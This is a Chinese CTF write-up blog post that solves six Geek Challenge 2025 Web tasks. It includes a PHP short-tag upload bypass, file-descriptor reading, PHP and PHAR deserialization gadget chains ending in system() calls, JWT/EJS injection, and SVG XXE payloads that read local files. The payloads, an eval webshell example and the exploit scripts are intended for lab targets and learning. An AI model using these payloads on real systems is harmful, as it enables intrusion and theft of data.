跳到主要内容极客大挑战 2025 Web 题目复现 | 极客日志PHPNode.js算法
极客大挑战 2025 Web 题目复现
复现了极客大挑战 2025 中的六道 Web 安全题目,涵盖文件上传绕过、文件描述符读取、PHP 反序列化链构造、JWT 与 EJS 模板注入、SVG XXE 攻击以及 PHAR 反序列化。详细解析了各题目的漏洞原理、利用步骤及关键代码逻辑,旨在帮助读者理解相关技术点并掌握解题思路。
王者7 浏览 题解
1. one_last_image(php 文件上传/短标签利用)
进来以后发现是个文件上传的题,然后就试着传一个 php 文件上去。
发现里面给出了 uploads 的路径,访问。如果是空的 php 进去会发现什么都没有,为了绕过对常见的 php 标签以及命令执行函数的限制,我们用短标签。
<?=`env`; 或 <?=('sys'.'tem')('env');
然后顺着操作即可。然后其他人说在 phpinfo 里面可以找到。
2. Vibe SEO(站点地图的使用/未关闭文件与文件描述符的读取)
看到这个题还是很蒙的,因为界面里什么都没有。然后了解了一下才知道站点地图是什么。
站点地图(sitemap.xml)是一个 XML 格式的文件,它列出了网站中所有重要的网页 URL,并可以附带每个 URL 的额外信息(例如最后更新时间、更新频率、相对重要性等),主要作用是帮助搜索引擎更高效、全面地抓取和索引网站内容。
以下是它的核心要点:
- 引导搜索引擎爬虫:特别是对于大型、结构复杂(深层链接多)或新建立的网站,能确保搜索引擎发现所有重要页面,避免遗漏。
- 提示更新频率和优先级:通过
<lastmod>(最后修改时间)、<changefreq>(更新频率)和 <priority>(优先级,0.0-1.0)等可选标签,为搜索引擎抓取提供参考建议(搜索引擎不一定会完全遵循)。
- 加速内容索引:新发布或更新的页面可以通过提交站点地图,更快地被搜索引擎发现和收录。
- 文件位置:通常放置在网站的根目录下,例如:
- 大型网站可以使用站点地图索引文件来管理多个站点地图文件。
盲猜 /aa__^^.php 是个线索。
微信扫一扫,关注极客日志
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
相关免费在线工具
- 加密/解密文本
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
- curl 转代码
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
- Base64 字符串编码/解码
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
- Base64 文件转换器
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
- Markdown转HTML
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
- HTML转Markdown
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
从中可以看到:脚本正在寻找一个叫 filename 的参数 readfile()。那么尝试提供一个参数 /aa__^^.php?filename=aa__^^.php 可以成功读到这个脚本的源码:
<?php $flag = fopen('/my_secret.txt', 'r'); if (strlen($_GET['filename']) < 11) { readfile($_GET['filename']); } else { echo "Filename too long"; }
很明显,我们不可能直接获得答案,因为字符限制。但是,因为 fopen 打开了 txt 文件并且将 handle 的值给了变量 flag。并且他没有对应的文件关闭操作,所以,他可以通过文件描述符来进行读取。
(Linux 中一个进程打开一个文件时,内核会分配一个文件描述符给这个文件 handle,新打开的文件从 3 开始递增,可以通过 /proc/self/fd/<自然数> 或 /dev/fd/<自然数>来访问这些文件描述符)
import requests
URL = "http://REPLACE TO YOUR URL"
for i in range(99):
print(requests.get(URL + f"/aa__^^.php?filename=/dev/fd/{i}").text)
3. popself(php 反序列化)
这题对于小白来讲还是不太友好,有这么一些前置知识是需要了解的。然后对我来说还是太费脑了些,所以很多参考了前人的题解,最后比较勉强的写了这篇。
- 对魔术方法的基础利用(可参考相关教程)
- 可变函数的数组调用
甲、php 的反序列化是什么?
**定义:**把保存在内存中的各种对象状态 (属性) 保存起来,并且在需要时候还原出来。
那么具体的讲,就是我们在传输一个对象的时候为了便于保存,传输,我们需要对他做一定的修改,使其快捷高效。可以想象成整理行李箱。需要携带的衣物(对象属性)被折叠整齐(编码),按照特定顺序放入箱子(字节流)。拉链闭合后(序列化完成),箱子可以通过运输工具(网络/存储)传递。到达目的地后开箱(反序列化),衣物恢复原有形态。
<?php class Person { private $name; private $age; function __construct($name, $age) { $this->name = $name; $this->age = $age; } function say() { echo "我的名字叫:" . $this->name . "<br/>"; echo "我的年龄是:" . $this->age; } }
$p1 = new Person("张三", 20);
$p1_string = serialize($p1);
$fh = fopen("p1.text", "w");
fwrite($fh, $p1_string);
fclose($fh);
O:6:"Person":2:{s:12:" Person name";s:4:"张三";s:11:" Person age";i:20;}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}
可見,序列化后的對象所有的變量都被保存下來了,而且,其序列化后的结果都有一个对应的字符,关系如下
通过这个例子,我们就能理解 php 的序列化是什么,自然的,反序列化也无非就是反过来解析而已。
乙、序列化的漏洞何时发生?
当用户的请求在传给反序列化函数 unserialize() 之前没有被正确的过滤时就会产生漏洞。因为 PHP 允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的 unserialize 函数,最终导致一个在该应用范围内的任意 PHP 对象注入。
事实上,当我们的对象在序列化的过程中势必会用到一下其他的方法,否则不可能将他转译,这些方法在 php 中即为魔术方法(以双下划线 __开头的方法,它们会在特定时机被 PHP 自动调用)。这是整个攻击的基石。本题中用到的关键魔术方法有:
__destruct(): 析构方法。当一个对象被销毁时(比如脚本执行结束),PHP 会自动调用它。__set(): 当给一个对象的不存在的属性或**不可访问的属性(如 private)**赋值时,PHP 会自动调用它。__call(): 当调用一个对象的不存在的方法或不可访问的方法时,PHP 会自动调用它。__toString(): 当把一个对象当作字符串来使用时(比如 echo $object),PHP 会自动调用它。__invoke(): 当把一个对象当作函数来调用时(比如 $object()),PHP 会自动调用它。
对此,我们可以明确,对象漏洞的发生必须有两个先决条件:
一、unserialize 的参数可控。
二、代码里有定义一个含有魔术方法的类,并且该方法里出现一些使用类成员变量作为参数的存在安全问题的函数
举例说明:在这个代码中,用户输入直接反序列化,所以我们可以直接构造如图中?后的语句,传入后调用_destruct() 函数,覆盖 test 变量并输出 lemon。所以,只要我们发现了一个漏洞点,就可以利用他控制输入变量,拼接我们想要的对象。
<?php class A{ var $test = "demo"; function __destruct(){ echo $this->test; } }
$a = $_GET['test'];
$a_unser = unserialize($a);
?>
<?php class A{ var $test = "demo"; function __destruct(){ @eval($this->test);
}$test = $_POST['test'];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}";
$test_unser = unserialize($pp);
?>
我们手动构造序列化对象就是为了 unserialize() 函数能够触发 __destruc() 函数,然后执行在 __destruc() 函数里恶意的语句。
所以我们利用这个漏洞点便可以获取 web shell 了。
丙、初步练习
<?php class SoFun { public $file = 'index.php'; function __destruct() { if(!empty($this->file)){ if(strchr($this->file, "\\") === false && strchr($this->file, "/") === false) { echo "<br>"; show_source(dirname(__FILE__).'/'.$this->file); } else die('Wrong filename.'); } }
function __wakeup() { $this->file = 'index.php'; }
public function __toString() { return '*****'; }
}
if (!isset($_GET['file'])) { show_source('index.php'); }
else { $file = $_GET['file']; echo unserialize($file); }
?> <!--key in flag.php-->
<?php echo "rsv{千里之行,始于足下}"; ?>
现在你会看到一个可以读出 file 的 show_source(dirname(FILE) . '/' . $this->file); 语句,通过 destruct 方法打开 flag.php。然后会重置文件名的 wakeup 方法,将你的文件名置为 index.php。
这里用到 CVE-2016-7124 漏洞:当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过 __wakeup 的执行。
构造序列化对象:O:5:"SoFun":1:{s:4:"file";s:8:"flag.php";}
易有构造绕过 __wakeup:O:5:"SoFun":2:{s:4:"file";s:8:"flag.php";}
丁、回到题目
__destruct():对象销毁时触发,是本题利用链起点。__set():给对象不存在 / 不可访问属性赋值时触发。__call():调用对象不存在 / 不可访问方法时触发。__invoke():对象被当作函数调用时触发。__toString():对象被当作字符串使用时触发。
要进入 __set() 里的 if 块,即需要满足 __set 的触发前提:
main 对象的 __destruct() 里执行了 $this->QYQS->partner = "summer"。$this->QYQS 指向的是 qyqs 对象;而 QYQS 对象没有 partner 属性(类里定义的属性是 Fox、komiko 等,无 partner);给对象不存在的属性赋值,从而触发 qyqs 对象的 __set() 方法 这样就进入了 __set 函数体。
这里涉及第一个技术点:MD5 弱类型比较 == 在 PHP 中,如果两个字符串以 0e 开头,后面全是数字,在进行 ==比较时,PHP 会将它们视为科学计数法,都等于数字 0,从而使条件成立。例如:md5('f2WfQ') 的结果是 0e291242476940776845150308577824,md5('0e215962017') 的结果也是 0e291242476940776845150308577824。所以 "0e..." == "0e..."结果为 true。因此,我们只需设置:
- $obj->KiraKiraAyu = 'f2WfQ'
- $obj->K4per = '0e215962017'
if(md5(md5($this->KiraKiraAyu))==md5($this->K4per)){ echo "BOY♂ sign GEEK<br>"; echo "开启循环吧<br>"; $this->QYQS->partner = "summer"; }
然后是两个 if 条件,我们刚才 $this->QYQS->partner = "summer"的时候事实上已经创建了对象 qyqs 并且通过 set 设置 partner 属性,因此$this->QYQS->partner = "summer";,等价于 $qyqs->partner = "summer";所以现在我们的$this所指代就是 qyqs 对象,$fox就是你设置的 ["summer", "find_myself"](数组)。instanceof用来判断变量是否是某个类的实例,数组显然不是 All_in_one 的实例,因此结果为 true。
然后是第二个条件判断。这里用到第二个技术点:PHP 的可调用对象 在 PHP 中,数组 ['ClassName', 'staticMethodName'] 可以被当作函数来调用,效果是执行那个静态方法。对于 $fox = ["summer", "find_myself"],调用 $fox() 等价于执行 summer::find_myself();而 summer 类的 find_myself() 方法也返回 "summer",因此 $fox() === "summer"结果为 true。
$fox = $this->Fox; if ( !($fox instanceof All_in_one) && $fox()==="summer"){ echo "QYQS enjoy summer<br>"; echo "开启循环吧<br>"; $komiko = $this->komiko; $komiko->Eureka($this->L, $this->sleep3r);
上一步 if 成立,执行 $komiko->Eureka($this->L, $this->sleep3r)。
这里触发 __call():
1.$komiko 是 $qyqs 的一个属性,我们也可以控制它指向另一个对象(比如指向最初的 $main 对象)。
2.Eureka 这个方法在 All_one 类中并不存在。
3.根据规则,调用一个对象的不存在方法,会触发该对象的 __call() 方法。
public function __call($method, $args){ if (strlen($args[0])<4 && ($args[0]+1)>10000){ echo "再走一步<br>"; echo $args[1]; } else{ echo "你要努力进窄门<br>"; } }
我们需要让 if 条件成立:1. strlen($args[0]) < 4:第一个参数长度小于 4。2. ($args[0] + 1) > 10000:第一个参数加 1 大于 10000。
怎么做呢?这就涉及到PHP 弱类型和科学计数法 我们可以设 $qyqs->L = "1e5": • strlen("1e5")是 3,满足。 "1e5" + 1,PHP 会将字符串 "1e5"当作数字 100000 处理,100000 + 1 = 100001 > 10000,满足。条件成立,执行 echo $args[1];。 $args[1]是 $this->sleep3r,我们控制它指向第三个对象 $sleep3r。
但是,$args[1]是一个对象,当我们用 echo 去输出它时,PHP 会试图把它变成字符串,于是调用了它的 __toString() 方法。
public function __tostring(){ echo "再走一步...<br>"; $a = $this->_4ak5ra; $a(); }
$a();!!!它把 $this->_4ak5ra 当作函数来调用。
这里触发最后一步 __invoke():我们设置 $sleep3r->_4ak5ra = $sleep3r,即让它自己指向自己。那么 $a() 就是 $sleep3r()。根据规则,把一个对象当作函数调用,会触发它的 __invoke() 方法。
public function __invoke(){ echo "恭喜成功 signin!<br>"; echo "welcome to Geek_Challenge2025!<br>"; $f = $this->Samsāra; $arg = $this->ivory; $f($arg); }
这里就非常直接了。它把 $this->Samsāra当作函数来调用,并传入参数 $this->ivory。
$sleep3r->Samsāra = "system"$sleep3r->ivory = "printenv"
那么,最终 $f($arg)就是 system("printenv")。
4. Expression(jwt/ EJS 渲染漏洞)
jwt 由三部分组成,用点。分隔:Header.Payload.Signature。抓完包以后可以看见,然后我们把他丢到 JSON Web Tokens - jwt.io 上面破译。得到密钥是 secret,然后会发现,用户名是由服务器端随机生成并返回的,但是他没有进行过滤,所以我们试着对他进行操作。
另外,从截获的响应里面可以知道他用的是 Node.js + Express,即 EJS 模板引擎,他最为严重的问题就是 如未经转义在用户端渲染过程中就会提供一个攻击的途径:
| 语法 | 作用 | 特点 |
| <% %> | 执行 JS 代码(无输出) | 流程控制专用 |
| <%= %> | 输出表达式结果(转义 HTML) | 安全输出,防 XSS |
| <%- %> | 输出表达式结果(不转义 HTML) | 适合渲染富文本,有风险 |
| <%# %> | EJS 注释 | 不执行、不显示 |
| <%% %> | 输出字面量<% | 转义 EJS 语法标签 |
可以看见我们的思路得到了验证,继续让他暴露自己的环境。
5. Image Viewer (XXE & SVG)
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<circle cx="100" cy="100" r="50" fill="red"/>
<text x="100" y="110" text-anchor="middle" fill="white">
SVG
</text>
</svg>
<!DOCTYPE html>
<html>
<body>
<h1>我的 SVG 图形</h1>
<svg>
<circle cx="100" cy="100" r="50" fill="blue"/>
<text x="100" y="110" text-anchor="middle" fill="white">
SVG
</text>
</svg>
<img src="graphic.svg" alt="SVG 图形">
</body>
</html>
打开文件选择,会发现存在 svg 格式的图片上传通道。
当我的网站在解析 svg 时没有禁用外部实体,就可能导致 xxe(Extensible Markup Language External Entity Injection)
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:/flag" >
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///flag" >
]>
<svg>
<text x="10" y="20">&file;</text>
</svg>
6. ez-seralize
前置提要Phar(PHP Archive)反序列化漏洞是 PHP 安全领域中一个非常重要且巧妙的攻击技术。与常规反序列化漏洞不同,Phar 反序列化不需要代码中存在明显的 unserialize() 函数,只要存在文件操作函数即可触发,这使其具有极高的隐蔽性和广泛的适用性。原理概述:由于 phar://协议,使得当我们通过phar://流包装器进行了文件的读取操作时(无论目标文件扩展名为何,只要其二进制结构符合 PHAR 格式),解析器读取文件元信息会自动执行 unserialize() 函数反序列化元数据,这为文件中上下文没有反序列化语句时提供了良好的攻击途径。攻击者可以将序列化后的恶意对象存储在 PHAR 文件的元数据中,并利用任何能够以 phar://协议操作文件的功能(如 file_get_contents, include等)作为触发点,在目标代码没有显式调用 unserialize()的情况下,触发反序列化漏洞,执行任意代码。利用条件:文件上传 + 文件操作函数 + 参数可控
几乎所有文件操作函数都可能触发
Phar 反序列化本身只是'触发反序列化',能否执行命令取决于目标代码中是否存在可利用的反序列化 Gadget 链。
看到题目,我先想到 robot,然后顺藤摸瓜,看下代码里面有没有线索。
<?php class A { public $file; public $luo; public function __construct() { } public function __toString() { $function = $this->luo; return $function(); } }
class B { public $a; public $test; public function __construct() { } public function __wakeup() { echo($this->test); } public function __invoke() { $this->a->rce_me(); } }
class C { public $b; public function __construct($b = null) { $this->b = $b; } public function rce_me() { echo "Success!\n"; system("cat /flag/flag.txt > /tmp/flag"); }
}
完了,看到现在居然还是没看懂 phar 怎么打。算了,先找同类题看看吧。
<?php class A { public $file; public $luo; }
class B { public $a; public $test; }
class C { public $b; public function rce_me() { system("cat /flag/flag.txt > /tmp/flag"); } }
$c = new C();
$b = new B();
$b->a = $c;
$a = new A();
$a->file = $b;
$a->luo = [$b, '__invoke'];
$b->test = $a;
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($b);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
